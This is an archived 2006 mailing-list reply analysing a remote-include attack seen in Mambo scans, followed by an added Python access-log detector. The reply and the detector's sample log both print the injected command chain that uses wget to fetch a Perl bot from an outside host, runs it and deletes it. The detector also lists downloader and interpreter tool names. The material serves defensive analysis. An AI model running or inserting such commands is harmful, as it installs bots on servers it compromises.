Re: High volume of Mambo scans (perlb0t)
From: Peter Kosinar (goober ksp.sk)
Date: Mon May 15 2006 - 12:26:29 CDT
Hello,
> I was looking at the scripts they try to download and
> it does not look like a common perl bot (connecting
> to irc). It's also written in php and by a Brazilian
> person (comments in Portuguese) and with terrible
> code :) I didn't have time to fully look at it,
> though.
>
> These are the pages they access:
>
> http://usuarios.lycos.es/athos666/d25/
> http://usuarios.lycos.es/athos666/d25/therules25.dat
> http://radius01.comete.ci/tool.gif
Actually, the tool.gif file (and the other parts of it) is just the first
level of the attack machinery -- it's _the_ PHP script which actually gets
remotely included and it understands some simple commands and displays
the results in nice form. In this particular case, the interesting
argument is "cmd=..." which executes the given command.
As you can see from the remaining portion of the request, the executed
compound command in this case consisted of:
1) cd /tmp
2) wget http://radius01.comete.ci/session.gif
3) perl session.gif
4) rm -rf session.*
The session.gif file is the Perlbot I and other posters mentioned.
Peter
--
[Name] Peter Kosinar [Quote] 2B | ~2B = exp(i*PI) [ICQ] 134813278
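The request pattern Peter describes (a URL parameter pointing at a remote PHP script, plus a "cmd=" parameter carrying a download-and-execute chain) is easy to pick out of a web server access log. The following is an added example, not code from the thread or from any project discussed in it: a small Python detector that parses Apache combined-format lines, flags any query parameter whose value is an absolute URL (the remote-include indicator), and splits a "cmd" value into its compound-command steps to spot a downloader followed by an interpreter. The log lines are constructed for the example; the hostnames and file names in the first line are taken from the thread, the vulnerable parameter name "some_param" and the client addresses are made up.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample log (Apache combined format). Line 1 mimics the request
# discussed in the thread; line 2 is a benign request for contrast.
SAMPLE_LOG = """\
203.0.113.7 - - [15/May/2006:10:02:11 -0500] "GET /index.php?option=com_foo&some_param=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.* HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.4 - - [15/May/2006:10:03:45 -0500] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# Shell operators that join the steps of a compound command.
STEP_SPLIT_RE = re.compile(r'\s*(?:;|&&|\|\||\|)\s*')

DOWNLOADERS = {"wget", "curl", "fetch", "lwp-download", "lynx"}
INTERPRETERS = {"perl", "sh", "bash", "python", "php", "ruby"}


def parse_access_line(line):
    """Return (client, target) from a combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group("client"), m.group("target")


def query_params(target):
    """Split a request target's query string into (name, value) pairs.

    Splitting is done by hand on '&' only, so a ';' inside a value (as in the
    compound command) is preserved instead of being treated as a separator.
    """
    query = urlsplit(target).query
    pairs = []
    for chunk in query.split("&"):
        if not chunk:
            continue
        name, _, value = chunk.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def command_steps(cmd):
    """Break a compound shell command into its individual steps."""
    return [s for s in STEP_SPLIT_RE.split(cmd) if s.strip()]


def is_download_and_execute(steps):
    """True when one step invokes a downloader and a later step an interpreter."""
    saw_download = False
    for step in steps:
        tool = step.split()[0].rsplit("/", 1)[-1]
        if tool in DOWNLOADERS:
            saw_download = True
        elif saw_download and tool in INTERPRETERS:
            return True
    return False


def analyze_request(line):
    """Return a finding dict for a suspicious request, or None for a benign one."""
    parsed = parse_access_line(line)
    if parsed is None:
        return None
    client, target = parsed
    params = query_params(target)
    remote = [(n, v) for n, v in params if REMOTE_URL_RE.match(v)]
    cmd = next((v for n, v in params if n == "cmd"), None)
    if not remote and cmd is None:
        return None
    steps = command_steps(cmd) if cmd else []
    return {
        "client": client,
        "remote_includes": remote,
        "command_steps": steps,
        "download_and_execute": is_download_and_execute(steps),
    }


def scan_log(text):
    """Run analyze_request over every line and collect the findings."""
    return [f for f in (analyze_request(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The remote-include check deliberately keys on the value, not the parameter name, so it catches the same technique against any script with an includable path variable; the download-then-interpret check is what separates "someone probing for an include" from "someone who got as far as running code".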